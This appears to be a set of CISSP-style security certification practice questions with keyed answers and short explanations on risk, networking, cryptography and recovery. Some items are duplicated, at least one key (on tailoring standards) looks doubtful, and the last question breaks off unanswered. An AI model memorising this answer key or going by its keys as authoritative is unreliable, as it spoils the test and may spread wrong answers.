A. The principles of criminalistics are included in the forensic investigation process. They are identification of the crime scene, protection of the environment against contamination and loss of evidence, identification of evidence and potential sources of evidence, and collection of evidence. In regard to minimizing the degree of contamination, it is important to understand that it is impossible not to change a crime scene—be it physical or digital. The key is to minimize changes and document what you did and why, and how the crime scene was affected.

A disaster recovery team has begun its initial assessment of all physical security risks and associated countermeasures. There are several factors to consider. Which should bear the most weight? A. The protection of life. B. The protection of critical assets. C. The protection of data D. Ensuring compliance with state and national regulations.

A. The protection of life.

John is the new director of software development within his company. Several proprietary applications offer individual services to the employees, but the employees have to log into each and every application independently to gain access to these discrete services. John would like to provide a way that allows each of the services provided by the various applications to be centrally accessed and controlled. Which of the following best describes the architecture that John should deploy? A. Service-oriented architecture B. Web services architecture C. Single sign-on architecture D. Hierarchical service architecture

A. The use of web services in this manner also allows for organizations to provide service-oriented architecture (SOA) environments. SOA is way to provide independent services residing on different systems in different business domains in one consistent manner. This architecture is a set of principles and methodologies for designing and developing software in the form of interoperable services.

Which of the following is usually NOT considered when classifying data? A. The user base of the data. B. The value of the data C. The age of the data D. The usefulness of the data.

A. The user base of the data.

Joan needs to document a data classification scheme for her organization. Which criteria should she use to guide her decisions? A. The value of the data and the age of the data. B. legal responsibilities based on ISO regulations. C. Who will be responsible for protecting the data and how D. How an adverse data breach would be handled.

A. The value of the data and the age of the data.

Tanya is the security administrator for a large distributed retail company. The company's network has many different network devices and software appliances that generate logs and audit data. Tanya and her staff have become overwhelmed with trying to review all of the log files when attempting to identify if anything suspicious is taking place within the network. Which of the following is the best solution for this company to implement? A. Security information and event management B. Event correlation tools C.Intrusion detection systems D. Security event correlation management tools

A. Today, many organizations are implementing security event management (SEM) systems, also called security information and event management (SIEM) systems. These products gather logs from various devices (servers, firewalls, routers, etc.) and attempt to correlate the log data and provide analysis capabilities. Companies also have different types of solutions on a network (IDS, IPS, antimalware, proxies, etc.) collecting logs in various proprietary formats, which require centralization, standardization, and normalization. Log formats are different per product type and vendor; thus, SIEM puts them into a standardized format for useful reporting.

To protect a specific word, symbol or name, a company would acquire which of the following? A. Trademark B. Copyright C. patent D. Trade Secret.

A. Trademark.

Which OSI layer handles flow control? A. Transport B. Data link C. Physical D. Network

A. Transport

Which of the following makes the most sense for a single organization's classification levels for data? A. Unclassified, Secret, Top Secret B. Public, Releasable, Unclassified C. Sensitive, Sensitive But Unclassified (SBU), Proprietary D. Proprietary, Trade Secret, Private

A. Unclassified, Secret, Top Secret

Why is "test coverage" an important consideration during an audit? A. The percentage of systems or controls to be tested should not exceed the threshold beyond which further testing yields no additional results or useful information, in order to limit unnecessary expense. B. The coverage of any given test should always include all possible systems and controls within scope of the audit. Nothing should be excluded unnecessarily. C. Tests should cover not only the systems in scope, but also the adjoining or ancillary systems whose configurations may possibly affect the systems within scope. D. The systems to be covered within any given test should not be decided by the enterprise being tested, but rather designated only by a third-party assessor.

A. When testing a set of controls across a fleet of systems, if it can be determined that they are uniformly configured and deployed, it may make little sense to inspect each of them individually, and certainly will increase the cost of the assessment. As with any activity within a business environment, costs and benefits must be considered with a goal of achieving the best balance between them.

Use the following scenario to answer Questions 1-3. Josh has discovered that an organized hacking ring in China has been targeting his company's research and development department. If these hackers have been able to uncover his company's research finding, this means they probably have access to his company's intellectual property. Josh thinks that an e-mail server in his company's DMZ may have been successfully compromised and a rootkit loaded. 1 Based upon this scenario, what is most likely the biggest risk Josh's company needs to be concerned with? A. Market share drop if the attackers are able to bring the specific product to market more quickly than Josh's company. B. Confidentiality of e-mail messages. Attackers may post all captured e-mail messages to the Internet. C. Impact on reputation if the customer base finds out about the attack. D. Depth of infiltration of attackers. If attackers have compromised other systems, more confidential data could be at risk.

A. While they are all issues to be concerned with, risk is a combination of probability and business impact. The largest business impact out of this list and in this situation is the fact that intellectual property for product development has been lost. If a competitor can produce the product and bring it to market quickly, this can have a long-lasting financial impact on the company.

In the structure of Extensible Access Control Markup Language (XACML), a Subject element is the ____________, a Resource element is the _____________, and an Action element is the ____________. A. requesting entity, requested entity, types of access B. requested entity, requesting entity, types of access C. requesting entity, requested entity, access control D. requested entity, requesting entity, access control

A. XACML uses a Subject element (requesting entity), a Resource element (requested entity), and an Action element (types of access). XACML defines a declarative access control policy language implemented in XML.

If the Annual Loss Expectancy (ALE) for a specific asset is $100,000, and after implementation of the control the new ALE is $45,000 and the annual cost of the control is $30,000, should the company implement this control? A. Yes B. No C. Not enough information D. Depends on the Annualized Rate of Occurrence (ARO)

A. Yes, the company should implement the control, as the value would be $25,000.

Which of the following best describes the difference between an information systems contingency plan and disaster recovery plan? A. information systems contingency plan procedures are developed for recovery of the system regardless of site or location. B. Disaster recovery plan procedures are developed for recovery of the system regardless of site or location. C. Disaster recovery plan can be activated at the system's current location or at an alternate site. D. information systems contingency plan is primarily a site-specific plan.

A. information systems contingency plan procedures are developed for recovery of the system regardless of site or location.

Block ciphers use which of the following to perform mathematical functions, substitutions, and permutations on message bits? A. s-boxes B. certificates. C. keystream D. initialization vectors

A. s-boxes

MODAF

Architecture framework used mainly in military support missions developed by British Ministry of Defense.

The responsibility of the classification of data within an organization rests with whom? A. Data custodians. B. Senior management. C. Data classifiers. D. Unit managers.

B. Senior management.

Use the following scenario to answer Questions 22-24. A small remote office for a company is valued at $800,000. It is estimated, based on historical data, that a fire is likely to occur once every ten years at a facility in this area. It is estimated that such a fire would destroy 60 percent of the facility under the current circumstances and with the current detective and preventive controls in place. What is the single loss expectancy (SLE) for the facility suffering from a fire? A. $80,000 B. $480,000 C. $320,000 D. 60%

B. $480,000

There are several different types of databases. Which type does the graphic that follows illustrate? A. Relational B. Hierarchical C. Network D. Object-oriented

B. A hierarchical database uses a tree-like structure to define relationships between data elements, using a parent/child relationship. The structure and relationship between the data elements are different from those in a relational database. The tree structure contains branches, and each branch has a number of leaves, or data fields. These databases have well-defined, prespecified access paths, but they are not as flexible in creating relationships between data elements as a relational database. Hierarchical databases are useful for mapping one-to-many relationships.

Which best describes a hot-site facility versus a warm- or cold-site facility? A. A site that has disk drives, controllers, and tape drives B. A site that has all necessary PCs, servers, and telecommunications C. A site that has wiring, central air-conditioning, and raised flooring D. A mobile site that can be brought to the company's parking lot

B. A hot site is a facility that is fully equipped and properly configured so that it can be up and running within hours to get a company back into production. Answer B gives the best definition of a fully functional environment.

Which of the following is not a common component of configuration management change control steps? A. Tested and presented B. Service level agreement approval C. Report change to management D. Approval of the change

B. A well-structured change management process should be established to aid staff members through many different types of changes to the environment. This process should be laid out in the change control policy. Although the types of changes vary, a standard list of procedures can help keep the process under control and ensure it is carried out in a predictable manner. A change control policy should include procedures for requesting a change to take place, approving the change, documentation of the change, testing and presentation, implementation, and reporting the change to management. Configuration management change control processes do not commonly have an effect on service level agreement approvals.

What role should accountability play in the access to media and authorization portion of a company's operations security strategy policies? A. None. Accountability is managed by corporate security policies, not at the operator level. B. Accountability is the other side of the coin of authorization. If a user is properly authorized, any violations or errors he makes can be traced back to him. C. Accountability means that the creator of the company's access policy bears final accountability for any improper accesses. D. Accountability means that the entire IT department, as creator of the company's access policy, bears final accountability for any improper access.

B. Accountability is the other side of the coin of authorization. If a user is properly authorized, any violations or errors he makes can be traced back to him.

There are often scenarios where the IT staff must react to emergencies and quickly apply fixes or change configurations. When dealing with such emergencies, which of the following is the best approach to making changes? A. Review the changes within 48 hours of making them. B. Review and document the emergency changes after the incident is over. C. Activity should not take place in this manner. D. Formally submit the change to a change control committee and follow the complete change control process.

B. After the incident or emergency is over, the staff should review the changes to ensure that they are correct and do not open security holes or affect interoperability. The changes need to be properly documented and the system owner needs to be informed of changes.

Your company enters into a contract with another company as part of which your company requires the other company to abide by specific security practices. Six months into the effort, you decide to verify that the other company is satisfying these security requirements. Which of the following would you conduct? A. Third-party audit B. External (second-party) audit C. Structured walk-through test D. Full-interruption test

B. An external audit (sometimes called a second-party audit) is one conducted by (or on behalf of) a business partner to verify contractual obligations. Though it is possible that this be done by a third party (e.g., an auditing firm hired by either party), it is still an external audit because it is being done to satisfy an external entity.

What component of Kerberos helps mitigate replay attacks? A. Key distribution Center. B. Authenticator. C. Asymmetric Cryptography. D. Realms.

B. Authenticator.

For which of the following physical media is degaussing a relatively cheap and effective means of eradicating data? A. Optical disks (cd/dvds) B. Backup tapes. C. USB thumb drives. D. Hard disk drives (HDDs)

B. Backup tapes.

When a process creates a thread, because it needs some instructions and data processed, the CPU uses two registers, A ____ contains the beginning address that was assigned to the process , and a ___ contains the ending address. A. limit register, base register. B. Base register, limit register. C. dedicated register, limit register. D. limit register, special register.

B. Base register, limit register.

Which of the following is a true statement? A. Because the RPO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD. B. Because the RTO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD. C. Because the MTD must ensure that the RPO is not exceeded, the RTO must normally be shorter than the MTD. D. Because the ROO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD.

B. Because the RTO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD.

Which security model enforces the principle that the security levels of an object should never change and is known as the "strong tranquility" property? A. Biba B. Bell-LaPadula C. Brewer-Nash D. Noninterference

B. Bell-LaPadula models have rigid security policies that are built to ensure confidentiality. The "strong tranquility" property is an inflexible mechanism that enforces the consistent security classification of an object.

Paul has been handed two different smart cards and is told that one is a combi card and one is a hybrid card. What is the difference between the two? A. Both can work as a contact or a contactless card. A combi has two chips and a hybrid card has one chip. B. Both can work as a contact or a contactless card. A hybrid has two chips and a combi card has one chip. C. Both can work as a contact or contactless card, but the hybrid has an antenna. D. Both can work as a contact or a contactless card, but the combi has an antenna.

B. Both can work as a contact or a contactless card. A hybrid has two chips and a combi card has one chip.

Which of the following is used to spot protection within a few inches of the object? A. wave pattern motion detector. B. Capacitance detector. C. Field-powered device. D. Audio detector.

B. Capacitance detector.

Knowing who obtained evidence, what it was, where and when it was obtained, who secured it, and who controlled it, is part of an investigation principle known as_____. A. Due care. B. Chain of Custody. C. Best Evidence Rule. D. Due diligence.

B. Chain of Custody.

Mary is playing around on her computer late at night and discovers a way to compromise a small company's personnel files. She decides to take a look around, but does not steal any information. Is she still committing a crime even if she does not steal any of the information? A. No, since she does not steal any information, she is not committing a crime. B. Yes, she has gained unauthorized access. C. Not if she discloses the vulnerability she exploited to the company. D. Yes, she could jeopardize the system without knowing it.

B. Computer crime can broadly be defined as criminal activity involving an information technology infrastructure, including illegal access, illegal interception, data interference, systems interference, misuse of devices, forgery, and electronic fraud.

Before an effective physical security program can be rolled out, a number of steps must be taken. Which of the following steps come first in the process of rolling out a security program? A. create countermeasure performance metrics. B. Conduct a risk analysis. C. Design the program. D. Implement countermeasures.

B. Conduct a risk analysis.

Which of the following best describes what a transaction-processing system provides? A. Redundancy B. Consistency. C. Confidentiality. D. Availability.

B. Consistency.

Ethernet uses a shared medium for all stations on a LAN to communicate, and uses a carrier sense multiple access with collision detection (CSMA/CD) approach to managing communications between stations. Which of the following statements about this protocol best explains how it works? A. A control frame is passed from station to station, granting permission for that station to transmit once it is received. B. Each station is required to monitor the medium for transmissions and only transmit when all other stations are silent. Each station is also responsible for alerting all other stations if it observes more than one station transmitting at the same time. C. Each station is required to monitor the medium for transmissions and only transmit when all other stations are silent. Each station is also responsible for signaling its intent to transmit before doing so. D. A primary station is responsible for determining which of the other stations is due to transmit, by polling each of them at regular intervals to determine which station has data to transmit.

B. Each of the answers above describe methods for sharing a communications medium and managing collisions. With CSMA/CD, each station senses for whether another station is already transmitting before beginning to do so, but also senses whether a collision has occurred, and notifying all other stations that they need to back off before trying again.

Which of the following best describes the role of the Java Virtual Machine in the execution of Java applets? A. Converts the source code into bytecode and blocks the sandbox B. Converts the bytecode into machine-level code C. Operates only on specific processors within specific operating systems D. Develops the applets, which run in a user's browser

B. Java is an object-oriented, platform-independent programming language. It is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user's browser. Java is platform independent because it creates intermediate code, bytecode, which is not processor specific. The Java Virtual Machine (JVM) then converts the bytecode into machine-level code that the processor on the particular system can understand.

Which of the following is a field of study that focuses on ways of understanding and analyzing data in databases, with concentration on automation advancements? A. Artificial intelligence. B. Knowledge discovery in databases C. kerberos D. ANN.

B. Knowledge discovery in databases

Which of the following is a field of study that focuses on ways of understanding and analyzing data in databases, with concentration on automation advancements? A. artificial intelligence. B. knowledge discovery in databases C. kerberos D. ann

B. Knowledge discovery in databases.

What is the central hub called in a token ring network? A. Star. B. MAU C. PBX. D. MUA.

B. MAU

Which of the following refers to the expected amount of time it will take to get a device fixed and back into production after its failure? A. SLA B. MTTR C. Hot-swap D. MTBF

B. Mean time to repair (MTTR) is the expected amount of time it will take to get a device fixed and back into production after its failure. For a hard drive in a redundant array, the MTTR is the amount of time between the actual failure and the time when, after noticing the failure, someone has replaced the failed drive and the redundant array has completed rewriting the information on the new drive. This is likely to be measured in hours. For a nonredundant hard drive in a desktop PC, the MTTR is the amount of time between when the drive goes down and the point at which the replaced hard drive has been reloaded with the operating system, software, and any backed-up data belonging to the user. This is likely to be measured in days. For an unplanned reboot, the MTTR is the amount of time between the failure of the system and the point in time when it has rebooted its operating system, checked the state of its disks, restarted its applications, allowed its applications to check the consistency of their data, and once again begun processing transactions.

Which of the following is NOT one of the stages of the DHCP lease process? i. Discover ii. Offer. iii. Request. iv. Acknowledgement A. All of them. B. None of them. C. i D. ii

B. None of them.

Robert has been asked to increase the overall efficiency of the sales database by implementing a procedure that structures data to minimize duplication and inconsistencies. What procedure is this? A. Polymorphism B. Normalization C. Implementation of database views D. Constructing schema

B. Normalization is a process that eliminates redundancy, organizes data efficiently, reduces the potential for anomalies during data operations, and improves data consistency within databases. It is a systematic way of ensuring that a database structure is designed properly to be free of certain undesirable characteristics—insertion, update, and deletion anomalies—that could lead to a loss of data integrity.

Which of the following is not a true statement about viruses? A. Exist in disguise usually through a common program or file. B. Number one objective is to take up system resources. C. Usually initiates after a user action, such an opening an attachment. D. Requires a host application.

B. Number one objective is to take up system resources.

How does RADIUS allow companies to centrally control remote access? A. Once a user is authenticated a profile is generated based on his security token, which outlines what he is authorized to do within the network. B. Once a user is authenticated a pre-configured profile is assigned to him, which outlines what he is authorized to do within the network. C. Once the RADIUS client authenticates the user, the RADIUS server assigns him a pre-configured profile. D. Once the RADIUS client authenticates the user, the client assigns the user a pre-configured profile.

B. Once a user is authenticated a pre-configured profile is assigned to him, which outlines what he is authorized to do within the network.

John is a network administrator and has been told by one of his network staff members that two servers on the network have recently had suspicious traffic traveling to them and then from them in a sporadic manner. The traffic has been mainly ICMP, but the patterns were unusual compared to traffic on other servers over the last 30 days. John lists the directories and subdirectories on the systems and finds nothing unusual. He inspects the running processes and again finds nothing suspicious. He sees that the systems' NICs are not in promiscuous mode, so he is assured that sniffers have not been planted. Which of the following describes the most likely situation as described in this scenario? A. Servers are not infected, but the traffic illustrates attack attempts. B. Servers have been infected with rootkits. C. Servers are vulnerable and need to be patched. D. Servers have been infected by spyware.

B. Once the level of access is achieved, the attacker can upload a bundle of tools, collectively called a rootkit. A rootkit is software that implements stealth capabilities that are designed to hide the existence of certain processes or programs. Rootkit detection is difficult because a rootkit may be able to subvert the software that is intended to find it.

If an investigator needs to communicate to another investigator, but does not want the hacker to find this traffic, what type of communication should be used? A. digitally signed messages. B. out-of-band messages. C. Forensics frequency. D. Authentication and access control.

B. Out-of-band messages.

Which of the following is NOT a key phase in the identity management lifecycle? A. Provisioning of user accounts as they are brought on board, as well as system accounts as they become necessary for the deployment of new software. B. Privilege escalation as users are eventually promoted up the chain to managerial roles, and as system software is upgraded to include greater functionality. C. periodic user and system account reviews, to ensure that each such account remains necessary and valid. D. Deprovisioning of the accounts of users who have moved, left, or been terminated, as well as any system accounts that are no longer required because the software requiring them has been decommissioned.

B. Privilege escalation as users are eventually promoted up the chain to managerial roles, and as system software is upgraded to include greater functionality.

Amy reads a document from her workstation: !. access the Aspen Bridge by telnet 2. Enter into privileged mode. 3. Execute command . 6 and press Enter. 4. Load the config file 5. Hit Run What type of document is Amy reading? A. Policy B. Procedure C. Baseline D. Advisory

B. Procedure

Which of the following is not a responsibility of the memory manager within an operating system? A. Sharing B. Process organization C. Relocation D. Protection.

B. Process Organization.

Which of the following best describes the operating system component that contains the address of an instruction set to be fetched for execution? A. special register. B. Program counter. C. Protection ring. D. Initial load counter.

B. Program counter.

Which access control policy is enforced in an environment that uses containers and implicit permission inheritance using a nondiscretionary model? A. Rule-based B. . Role-based C. Identity-based D. Mandatory

B. Roles work as containers for users. The administrator or security professional creates the roles and assigns rights to them and then assigns users to the container. The users then inherit the permissions and rights from the containers (roles), which is how implicit permissions are obtained.

Which of the following best describes separation of duties and job rotation? A. Separation of duties ensures that more than one employee knows how to perform the tasks of a position, and job rotation ensures that one person cannot perform a high-risk task alone. B. Separation of duties ensures that one person cannot perform a high-risk task alone, and job rotation can uncover fraud and ensure that more than one person knows the tasks of a position. C. They are the same thing, but with different titles. D. They are administrative controls that enforce access control and protect the company's resources.

B. Rotation of duties enables a company to have more than one person trained in a position and can uncover fraudulent activities. Separation of duties is put into place to ensure that one entity cannot carry out a critical task alone.

Which markup language allows a company to send service requests and the receiving company to provision access to these services? A. XML B. SPML C. SGML D. HTML

B. Service Provisioning Markup Language (SPML) is a markup language, built on the Extensible Markup Language (XML) framework, that exchanges information about which users should get access to what resources and services. So let's say that an automobile company and a tire company only allow inventory managers within the automobile company to order tires. If Bob logs in to the automobile company's inventory software and orders 40 tires, how does the tire company know that this request is coming from an authorized vendor and user with the Inventory Managers group? The automobile company's software can pass user and group identity information to the tire company's software. The tire company uses this identity information to make an authorization decision that then allows Bob's request for 40 tires to be filled. Since both the sending and receiving companies are following one standard (XML), this type of interoperability can take place.

An assessment whose goal is to assess the susceptibility of an organization to social engineering attacks is best classified as A. Physical testing B. Personnel testing C. Vulnerability testing D. Network testing

B. Social engineering is focused on people, so personnel testing is the best answer.

Packets that contain routing information within their headers are referred to as what? A. broadcasting. B. Source routing C. Forwarding D. Poisoning.

B. Source routing

An activity that alters the state of a system is called a _____ A. unauthorized intrusion B. State transition C. moving data from a memory segment to the CPU's registers. D. Moving data from the CPUs registers to the correct memory address.

B. State Transition.

Bob needs to review the source code of a new product a team has been working on, in order to ensure that all user inputs have been properly validated prior to being processed. Which of the following terms is used to describe this activity? A. Dynamic analysis. B. Static analysis C. Fuzzing. D. Debugging.

B. Static analysis

Data in use is commonly A. Using a RESTful protocol for transmission B. Stored in registers C. Being transmitted across the network D. Stored in external storage devices

B. Stored in registers

A key stream generator is used in what type of cipher? A. Block B. Stream C. concealment D. DES.

B. Stream

. Which of the following best describes an application of cryptography to protect data in motion? A. Testing software against side-channel attacks B. TLS C. Whole-disk encryption D. EDLP

B. TLS

Bob is a hacker who intends to use social engineering strategies to infiltrate a former employer. After doing through research. He begins calling the customer service line to find the weakest representative, he begins calling the customer service to find the weakest representative to attack. He calls over and over again trying to talk to many different representatives, what phase of the social engineering attack is bob involved in? A. Dumpster diving. B. Target selection. C. Intelligene gathering. D. Attack mode.

B. Target selection.

What is a synthetic transaction? A. A bogus user transaction that must be disallowed B. A scripted process used to emulate user behavior C. User behavior intended to falsify records D. A scripted process by an attacker used to violate policy

B. Testing applications commonly involves the need to emulate usual user behaviors. However, in a test environment, the typical load of user activity is unavailable. Consequently, scripts of common user transactions can be constructed to facilitate various forms of tests.

Use the following scenario to answer Questions 28-30. Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters "%20" and "../". The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database. Which of the following best describes attacks that could be taking place against this organization? A. Cross-site scripting and certification stealing B. URL encoding and directory traversal attacks C. Parameter validation manipulation and session management attacks D. Replay and password brute-force attacks

B. The characters "%20" are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters "../" can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible. This is commonly referred to as a path or directory traversal attack.

Which of the following is true about IEEE 802.3 (Ethernet) and 802.11 (Wi-fi)? A. They are similar protocols at OSI layer 3, designed to solve different link layer problems. B. They are similar protocols at OSI layer 2, designed to solve different physical layer problems C. They are essentially the same protocol at OSI layer 2. D. They are essentially the same protocol at OSI layer 5.

B. They are similar protocols at OSI layer 2, designed to solve different physical layer problems.

How can a backup strategy be made most effective? A. By ensuring that all user data is backed up B. By testing restoration procedures C. By backing up database management systems (DBMSs) via their proprietary methods D. By reviewing backup logs to ensure they are complete

B. Unless the ability to restore from backups successfully is tested routinely, no other activities around data retention have value.

A widely used family of symmetric algorithms is called block ciphers. When these types of algorithms are being used, a message that needs to be encrypted is segmented into individual blocks and each block is encrypted. These algorithms work in different modes, and each mode has a specific use case. Which mode is being represented in the graphic and what is its most common use case? A. Electronic Code Book mode is used when individual and unique keys are needed to encrypt each block. B. Counter mode is used when encryption and decryption need to take place in parallel and independent block recovery is available. C. Cipher Block Chaining mode is used when added complexity is required by incorporating subkeys for each block encryption function. D. Output Feedback mode is used when segmented ciphertext blocks are required for inline encryption functionality.

B. Unlike most of the other block cipher modes, Counter (CTR) mode does not incorporate any chaining between blocks that are being encrypted. This means that the receiving end does not have to wait and receive all of the message blocks before starting to decrypt the message. The individual blocks are not coupled or dependent upon each other. Since the receiving end can decrypt the blocks as soon as they are received, the decryption process happens faster compared to other modes. Since the blocks are not chained and dependent upon each other, the individual message blocks can be independently recovered if necessary. Encryption modes that chain the blocks together do not allow for independent recovery—if one block gets corrupted, subsequent blocks become irrecoverable. For these reasons, CTR is most commonly used in newer versions of protocols such as IPSec and in technologies such as Wi-Fi. CTR mode is used when data within multiple packets needs to be transmitted between two systems over a network connection; thus, it is used by networking protocols. Other block modes, such as Electronic Code Book, are most often used within applications, not protocols.

Monitoring temperature and humidity levels in equipment rooms is a critical security control that operations groups must achieve. What type of control is this? A. logical B. environmental C. deterrent. D. Administrative.

B. environmental

Which of the following scenarios requires a "trusted recovery"? A. an application exits unexpectedly. B. a system is rebooted after a kernel failure. C. A backup procedure fails. D. A system is rebooted as part of routine maintenance.

B. a system is rebooted after a kernel failure.

Which of the following best describes the separation of duties and job rotation? A. separation of duties ensures that more than one employee knows how to perform the tasks of a position, and job rotation ensures that one person cannot perform a high-risk task alone. B. separation of duties ensures that one person cannot perform the high-risk tasks alone, and job rotation can uncover fraud and ensure that more than one person knows the tasks of a position. C. they are the same thing with different titles. D. they are administrative controls that enforce access control and protect the company's resources.

B. separation of duties ensures that one person cannot perform high-risk task alone, and job rotation can uncover fraud and ensure that more than one person knows the tasks of a position.

Charlie is a new security manager at a textile company that develops its own proprietary software for internal business processes. Charlie has been told that the new application his team needs to develop must comply with the iso/iec 42010 standard.He has found out that many of the critical applications have been developed in the C programming language and has asked for these applications to be reviewed for a specific class of security vulnerabilities. Which of the following best describes the standard charlie's team needs to comply with? A. international standard on system design to allow for better quality, interoperability, extensibility, portability, and security. B. international standard on system security to allow for better threat modeling. C international standard on system architecture to allow for better quality, interoperability, extensibility, portability, and security. D. international standard on system architecture to allow for better quality, extensibility, portability, and security.

C international standard on system architecture to allow for better quality, interoperability, extensibility, portability, and security.

Dogs are a fairly common physical control in particularly high security environments. Which of the following statements is most important when considering their deployment? A. Their sense of smell is much more acute than that of humans, and can even exceed the ability of other physical systems to detect the presence of some chemical compounds in minute amounts. B. They can be trained to effectively disable and safely detain an intruder until human agents can arrive and gain more positive control. C. They are incapable of making nuanced judgements as to who is a friend and who is foe, and so pose a significant risk to the safety of personnel. D. They can be easily disabled by an attacker via lethal force, without consideration of more consequential tactical or legal results of a lethal attack on human guards.

C.

4 What is the annualized loss expectancy (ALE)? A. $480,000 B. $32,000 C. $48,000 D. 6

C. $48,000

A static charge of ___ volts is able to cause disk drive data loss. A. 550 B. 1000 C. 1500 D. 2500

C. 1500

A static charge of ___ volts is able to cause disk drive data loss? A. 550 B. 1000 C. 1500 D. 2500

C. 1500

Database software performs three main types of integrity services: semantic, referential, and entity. Which of the following correctly describes one of these services? A semantic integrity mechanism makes sure structural and semantic rules are enforced. A database has referential integrity if all foreign keys reference existing primary keys. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A. ii B. ii, iii C. i, ii, iii D. i, ii

C. A semantic integrity mechanism makes sure structural and semantic rules are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database. A database has referential integrity if all foreign keys reference existing primary keys. There should be a mechanism in place that ensures no foreign key contains a reference to a primary key of a nonexistent record, or a null value. Entity integrity guarantees that the tuples are uniquely identified by primary key values. For the sake of entity integrity, every tuple must contain one primary key. If it does not have a primary key, it cannot be referenced by the database.

A reciprocal agreement is best described how? A. A site that has some computers and environmental controls B. A site that has fully redundant systems, software, and configurations. C. A site that is in use by another company already. D. An agreement that is enforceable.

C. A site that is in use by another company already.

What is the final step in authorizing a system for use in an environment? A. Certification B. Security evaluation and rating C. Accreditation D. Verification

C. Accreditation

Systems that are built on the OSI framework are considered open systems. What does this mean? A. They do not have authentication mechanisms configured by default. B. They have interoperability issues. C. They are built with internationally accepted protocols and standards so they can easily communicate with other systems. D. They are built with international protocols and standards so they can choose what types of systems they will communicate with.

C. An open system is a system that has been developed based on standardized protocols and interfaces. Following these standards allows the systems to interoperate more effectively with other systems that follow the same standards.

Which of the following proxies cannot make access decisions based upon protocol commands? A. Application B. Packet filtering C. Circuit D. Stateful

C. Application and circuit are the only types of proxy-based firewall solutions listed here. The others do not use proxies. Circuit-based proxy firewalls make decisions based on header information, not the protocol's command structure. Application-based proxies are the only ones that understand this level of granularity about the individual protocols.

Which of the following is the set of steps necessary to control changes in source code? A. prototype, test, and implement. B. Implement, Version, and deploy. C. Approve, document, and test. D. Approve, code, and test.

C. Approve, document, and test.

Host-based intrusion detection systems (IDS) mainly utilize which of the following to perform their analysis? A. Network throughput data. B. Downtime of connected devices. C. Audit logs and system files D. Network packets.

C. Audit logs and system files

Roles, groups, location, and time of day are all criteria for which type of validation decision? A. Identification B Authentication. C. Authorization. D. Accountability.

C. Authorization.

Roles, groups, location, and time of day are all criteria for which type of validation decision? A. identification. B. authentication C. Authorization. D. Accountability.

C. Authorization.

When selecting and implementing information assest protection standards, why is tailoring an important process? A. Because the penalties for noncompliance provided by the chosen standard may be too severe and unrealistic. B. because some of the provisions of the chosen standard might not apply to your organization's environment. C. Because some of the provisions of the chosen standard might better address your organization's environment if modified significantly . D. Because not all standards are a good fit for your organization, and so it is important to choose the best one.

C. Because some of the provisions of the chosen standard might better address your organization's environment if modified significantly

Data in motion is commonly A. Using a RESTful protocol for transmission B. Stored in registers C. Being transmitted across the network D. Stored in external storage devices

C. Being transmitted across the network

Establishing data classification levels within a company is essential as part of an overall security program. of the roles listed, who would be the best choice to sponsor a data classification program? A. IT administrator B. Security officer. C. Chief information officer. D. Security Awareness trainer.

C. Chief information officer.

Terry is a security manager for a credit card processing company. His company uses internal DNS servers, which are placed within the LAN, and external DNS servers, which are placed in the DMZ. The company also relies upon DNS servers provided by its service provider. Terry has found out that attackers have been able to manipulate several DNS server caches to point employee traffic to malicious websites. Which of the following best describes the solution this company should implement? A. IPSec B. PKI C. DNSSEC D. MAC-based security

C. DNSSEC (DNS security, which is part of the many current implementations of DNS server software) works within a PKI and uses digital signatures, which allows DNS servers to validate the origin of a message to ensure that it is not spoofed and potentially malicious. If DNSSEC were enabled on server A, then server A would, upon receiving a response, validate the digital signature on the message before accepting the information to make sure that the response is from an authorized DNS server. So even if an attacker sent a message to a DNS server, the DNS server would discard it because the message would not contain a valid digital signature. DNSSEC allows DNS servers to send and receive only authenticated and authorized messages between themselves and thwarts the attacker's goal of poisoning a DNS cache table.

__________________ is a set of extensions to DNS that provides to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attack types. A. Resource records B. Zone transfer C. DNSSEC D. Resource transfer

C. DNSSEC is a set of extensions to DNS that provides to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attack types. DNSSEC is a suite of Internet Engineering Task Force (IETF) specifications for securing services provided by the DNS as used on IP networks.

How many steps are required per the dynamic host configuration protocol (DHCP) for the initial assignment of an IP address, what are they, and in what order do they occur? A. Three: Syn, syn/ack, ack B. Three: discover, offer, ack. C. Four: discover, offer, request, ack. D. four: request, offer, accept, ack.

C. Four: discover, offer, request, ack.

What would indicate that a message had been modified? A. The public key has been altered. B. The private key has been altered. C. The message digest has been altered. D. The message has been encrypted properly.

C. Hashing algorithms generate message digests to detect whether modification has taken place. The sender and receiver independently generate their own digests, and the receiver compares these values. If they differ, the receiver knows the message has been altered.

What is the difference between hierarchical storage management and storage area network technologies? A. HSM uses optical or tape jukeboxes, and SAN is a standard of how to develop and implement this technology. B. HSM and SAN are one and the same. The difference is in the implementation. C. HSM uses optical or tape jukeboxes, and SAN is a network of connected storage. D. SAN uses optical or tape jukeboxes, and HSM is a network of connected storage systems.

C. Hierarchical storage management (HSM) provides continuous online backup functionality. It combines hard disk technology with the cheaper and slower optical or tape jukeboxes. The HSM system dynamically manages the storage and recovery of files, which are copied to storage media devices that vary in speed and cost. The faster media hold the data that is accessed more often, and the seldom-used files are stored on the slower devices, or near-line devices. The storage media could include optical disks, magnetic disks, and tapes. This functionality happens in the background without the knowledge of the user or any need for user intervention. A storage area network (SAN), on the other hand, consists of numerous storage devices linked together by a high-speed private network and storage-specific switches. When a user makes a request for a file, he does not need to know which server or tape drive to go to—the SAN software finds it and provides it to the user.

Which of the following best describes the type of solution Ron's team needs to implement? A. RAID and clustering B. Storage area networks C. High availability D. Grid computing and clustering

